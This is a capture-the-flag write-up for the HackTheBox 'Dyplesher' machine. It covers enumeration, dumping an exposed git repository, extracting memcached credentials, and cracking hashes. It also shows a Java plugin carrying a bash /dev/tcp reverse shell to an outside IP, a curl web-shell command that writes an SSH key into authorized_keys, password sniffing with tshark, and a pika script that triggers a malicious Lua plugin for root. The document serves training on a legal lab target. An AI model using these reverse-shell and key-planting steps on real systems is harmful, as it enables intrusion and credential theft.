HackTheBox Dyplesher Writeup – 10.10.10.190
The Dyplesher box starts with full enumeration. The machine was so unstable I was not able to run namp properly. Running the fuzzer gives a hint that Git is involved, however cloning and downloading the git is only the beginning. Once the Git is downloaded I come to know that the memcached is involved as well.
After getting the credentials using the Memcached-Cli tool another door opens, and another set of Git download need to be done. the full enumeration here is the must. Then comes the time-consuming plug-in development, if you are good in Java and not link me, it may be easy for you. So let us start.
Like every other machine, I add the machine IP to hots file with machine name and start the intense namp scan. The namp results shows few numbers of higher ports and common lower ports are open.
# root @ ns09 in ~/htb/dyplesher [16:49:06] $ nmap -p 1-16000 dyplesher.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 16:49 +03 Nmap scan report for dyplesher.htb (10.10.10.190) Host is up (0.14s latency). Not shown: 15994 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp open ppp 4369/tcp open epmd 5672/tcp open amqp 11211/tcp open memcache Nmap done: 1 IP address (1 host up) scanned in 186.15 seconds
The Web Service
As the HTTP port 80 is open, I opened the hosted page and it runs a Minecraft server – named “Worst Minecraft Server“. Also, I noticed another host name test.dyplesher.htb so add the new host to etc/hosts.
Both web apps didn’t reveal anything immediately, so I decided to run enumerate further using WFUZZ on both hosts. While the fuzzing is going on, I noticed the “.git” directory disclosed by the WFUZZ on test.dyplesher.htb.
wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,302 ----- wfuzz -u http://dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,302
Target: http://dyplesher.htb/FUZZ Total requests: 16243 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000001: 200 123 L 241 W 4252 Ch "index.php" 000000102: 200 0 L 0 W 0 Ch "favicon.ico" 000000149: 403 9 L 28 W 278 Ch ".htaccess" 000000237: 200 2 L 3 W 24 Ch "robots.txt" 000000517: 403 9 L 28 W 278 Ch ".html" 000000776: 403 9 L 28 W 278 Ch ".php" 000001499: 403 9 L 28 W 278 Ch ".htpasswd" 000001748: 403 9 L 28 W 278 Ch ".htm" 000002003: 403 9 L 28 W 278 Ch ".htpasswds" 000004397: 403 9 L 28 W 278 Ch ".htgroup" 000004914: 403 9 L 28 W 278 Ch "wp-forum.phps" 000006724: 403 9 L 28 W 278 Ch ".htaccess.bak" 000008245: 403 9 L 28 W 278 Ch ".htuser" 000010870: 403 9 L 28 W 278 Ch ".ht" 000010871: 403 9 L 28 W 278 Ch ".htc"
Cloning The Exposed Repository
I used the GitDumper to close the exposed Git repository and restored index.php.
# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper on git:master x $ ./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher ########### # GitDumper is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### [+] Downloaded: HEAD [-] Downloaded: objects/info/packs [+] Downloaded: description [+] Downloaded: config [+] Downloaded: COMMIT_EDITMSG [+] Downloaded: index [-] Downloaded: packed-refs [+] Downloaded: refs/heads/master [-] Downloaded: refs/remotes/origin/HEAD [-] Downloaded: refs/stash [+] Downloaded: logs/HEAD [+] Downloaded: logs/refs/heads/master [-] Downloaded: logs/refs/remotes/origin/HEAD [-] Downloaded: info/refs [+] Downloaded: info/exclude [-] Downloaded: /refs/wip/index/refs/heads/master [-] Downloaded: /refs/wip/wtree/refs/heads/master [+] Downloaded: objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388 [-] Downloaded: objects/00/00000000000000000000000000000000000000 [+] Downloaded: objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433 [+] Downloaded: objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [+] Downloaded: objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0 # root @ ns09 in ~/htb/dyplesher/GitTools/Dumper on git:master x $ cd test.dyplesher # root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o $ git restore index.php # root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o $ git restore README.md # root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o $
From restored index.php file I found the cached credentials of felamous.
Cached Credentials: felamos:zxcvbnm
As it was confirmed the Memcached is in place, let us use the well-known Memcached CLI tool (https://metacpan.org/pod/memcached-cli) .
Download the Tool:
Collecting Entries Using Memchached-CLI
Next step is to collect the memcached entries like user name and passwords using the credentials we have and the tool we just downloaded. The memcached server normally runs on the higher port: 11211.
# root @ ns09 in ~/htb/dyplesher $ memcached-cli felamos:firstname.lastname@example.org:11211 dyplesher.htb:11211> get username MinatoTW felamos yuntao dyplesher.htb:11211> get password $2a$10$5SAkMNF9fPNam***************ePuI1DCJa $2y$12$c3SrJLybUEOYm***************VrxiA3pQK $2a$10$zXNCus.UXtiuJ***************itiwUoalS dyplesher.htb:11211>
Cracking The Hash
As we retrieved the passwords in salted hash, we cannot use it , but there is Mr. John for our rescue.
I have the credentials, but not sure where to use, so I decided to check the other ports running thinking they probably have some services running.
Gogs At The Port 3000
So my wild guess was correct there are other services running in the box as well, there is a Gogs installation running on the port 3000.
I register myself as nav1n and logged in, then I found the following users:
So finally I know where the credentials to be used. I managed to access each account on Gogs using the cracked credentials.
We can see Felamos is hosting a copy of git and memcached in his repo, we can easily close the repositories to local machine as we have the credentials. And without wasting a moment I download the repo.
Upon enumerating the downloaded files I don’t see anything special, but noticed that the memcached is the one I downloaded earlier. And I took a while to enumerate more on the git and found the following releases.
I download them all, but only repositories’ directory contains a folder named @hashed and this folder contains hashed git bundles.
# root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x $ ls -la total 24 drwx------ 6 root root 4096 Sep 7 2019 . drwx------ 3 root root 4096 Sep 7 2019 .. drwx------ 3 root root 4096 Sep 7 2019 4b drwx------ 3 root root 4096 May 24 06:06 4e drwx------ 3 root root 4096 Sep 7 2019 6b drwx------ 3 root root 4096 Sep 7 2019 d4 # root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x $ find . -type f ./4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle ./d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle ./6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle ./4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle # root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x
Unpacking the Git Bundles
So what I did is, I moved all .bundle files into a new directory I created “Bundle-Unpack”.
# root @ ns09 in ~/htb/dyplesher/bundle-unpack $ ls -la total 21512 drwxr-xr-x 2 root root 4096 May 28 02:01 . drwxr-xr-x 5 root root 4096 May 28 02:00 .. -rw-r--r-- 1 root root 10837 Sep 7 2019 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle -rw-r--r-- 1 root root 21952510 May 24 06:17 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle -rw-r--r-- 1 root root 31545 Sep 7 2019 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle -rw-r--r-- 1 root root 17569 Sep 7 2019 d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle # root @ ns09 in ~/htb/dyplesher/bundle-unpack $
Then, I used Git Clone command to unpack them.
# root @ ns09 in ~/htb/dyplesher/bundle-unpack $ ls -la total 21512 drwxr-xr-x 2 root root 4096 May 28 . drwxr-xr-x 5 root root 4096 May 28 .. -rw-r--r-- 1 root root 10837 Sep 7 2019 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle -rw-r--r-- 1 root root 21952510 May 24 06:17 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle -rw-r--r-- 1 root root 31545 Sep 7 2019 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle -rw-r--r-- 1 root root 17569 Sep 7 2019 d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle # root @ ns09 in ~/htb/dyplesher/bundle-unpack $ git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'... Receiving objects: 100% (39/39), 10.46 KiB | 1.31 MiB/s, done. Resolving deltas: 100% (12/12), done. # root @ ns09 in ~/htb/dyplesher/bundle-unpack $ git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'... Receiving objects: 100% (51/51), 20.94 MiB | 37.61 MiB/s, done. Resolving deltas: 100% (5/5), done. # root @ ns09 in ~/htb/dyplesher/bundle-unpack $ git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'... Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done. Resolving deltas: 100% (40/40), done. # root @ ns09 in ~/htb/dyplesher/bundle-unpack $ git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'... Receiving objects: 100% (21/21), 16.98 KiB | 8.49 MiB/s, done. Resolving deltas: 100% (9/9), done.
Once the unpacking is successfully done, I started enumerating and this went almost 25 – 30 minutes of enumeration of the folders and the contents until found a directory Login Security which contained a SQLite database which eventually showed me there is a hashed credential.
I let John to crack the password and I talked to one of my friend over the Discord about the usage of the new credentials I got. Before he replies John finished his task and I have the clear text password now.
Logging In to Dashboard
As I was able to crack the password using JTR, I found the way to login as well. I logged-in to the dashboard suing one of the email id found earlier.
The dashboard has a statistics of users and option to upload/ delete and reload plugin. Other than this I don’t see anything useful. I again hit a wall, so decided to talk to friends at discord. The answer was not favorable, I need to create a plugin in Java with reverse shell, well, if you ask me what do I hate the in the coding most?, I tell you its JAVA and the Java development.
I finally found the easiest way (the laziest way) to make a workable Plugin with reverse shell and upload it through http://dyplesher.htb/home/add and then reload it to activate it.
I used the IntelliJIDEA IDE to develop the plugin.
Developing The Plugin
<groupId>htb.dyplesher</groupId> <artifactId>minecraft_plugin</artifactId> <version>TEST version 1</version>
I used the PentestMonkey‘s reverse shell idea and worked on it to make my own reverse shell.
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String) p.waitFor()
Uploading the Plugin:
Activating The Plugin
Once the plugin was loaded and activated successfully, I opened my PHP reverse shell nav1n.php and to make sure everything is working fine I run the WhoAmI and got MinatoTW as user.
The next step is to generate a fresh SSK key and copy my SSH Public key to MinatoTW’s ssh directory.
# root @ ns09 in ~/htb/dyplesher [17:31:03] $ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa already exists. Overwrite (y/n)? y Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: The key's randomart image is: +---[RSA 3072]----+ | . o o. | | B = oo | | + O o. . | | + ooo. | | +.S.o. | |o . o +o | | =oo. * . | |===+E . +. | |@BO+ . .. | +----[SHA256]-----+ # root @ ns09 in ~/htb/dyplesher [17:31:50] $ curl -G 'http://test.dyplesher.htb/nav1n.php' --data-urlencode 'cmd=echo ssh-rsa AAAAB3NzaC1yc/---------snip------------/floNC8dQgsN8= root@ns09 > /home/MinatoTW/.ssh/authorized_keys' # root @ ns09 in ~/htb/dyplesher [17:35:55]
Once uploaded, I made sure the key is copied from the reverse shell.
The next step is straightforward.
As I can see my SSH public key is copied, I immediately SSH the box as minatotw and got successfully logged-in.
As I can see the user MinatoTW is a part of Wireshark group, I’m not sure yet what to do with that, possibly he’s running Wireshark service. Let’s find it out. First I need to get the interface ids:
Once I know the interface I captured the traffic using the TShark.
Downloading the Capture:
I left the capture to run for like 15 minutes so that I could have as much as data possible. Once done I download the capture to my local machine using scp.
Analyzing PCAP file
I started analyzing the PCAP file as I know I’m going to fish something huge. After analyzing for few minutes, I found many users and their credentials and it didn’t take much time for me to understand these are the credentials I was looking for.
As soon as I gathered the password of the users, I tried to switch to a new user, and got logged-in as Felamos. The User.txt was found in Felamos” home directory and I grabbed it immediately.
After a couple of days of battle, I finally got the user. It was such a great feeling, I slept last night at 4AM, I wasted half of the time just finding a way to use Jar file to insert my reverse shell. It wouldn’t be that easy if not a fellow HTB’n give me nudge. His reply was so precise that I won the half the battle in the HTB forum DM itself.
So the Lua is running in the machine and after discussing with a couple of others at Discord we decided that the way of exploit is using malicious lua script/plugin. But question is how?
The Pika is the Advanced Message Queuing Protocol (AMQP) that is two-way RPC protocol where the client can send requests to the server and the server can send requests to a client, Pika implements or extends IO loops in each of its asynchronous connection adapters.
import pika credentials = pika.PlainCredentials('username', 'password') parameters = pika.ConnectionParameters(credentials=credentials)
So based on the above references, we made a python script to connect to the lus malicious plugin running in the server.
credentials = pika.PlainCredentials('yuntao', 'E********p') parameters = pika.ConnectionParameters('10.10.10.190',5672,'/',credentials) connection = pika.BlockingConnection(parameters) body='http://127.0.0.1:9999/68523.lua')
I made a lua plugin file and named it 68523.lua and copied my SSH public key in to it. When the file is triggered it will write my SSH key in to the
Then I run my python script lua.py from my local Kali machine.
At the same time I saw the request on the Server was hit and my malicious plugin was activated. I immediately ssh the box as root, but it didn’t work, I had to try a couple of times before finally I got the root.
Thanks for reading. It was a great box worth 50 points. the user was much harder than the Root.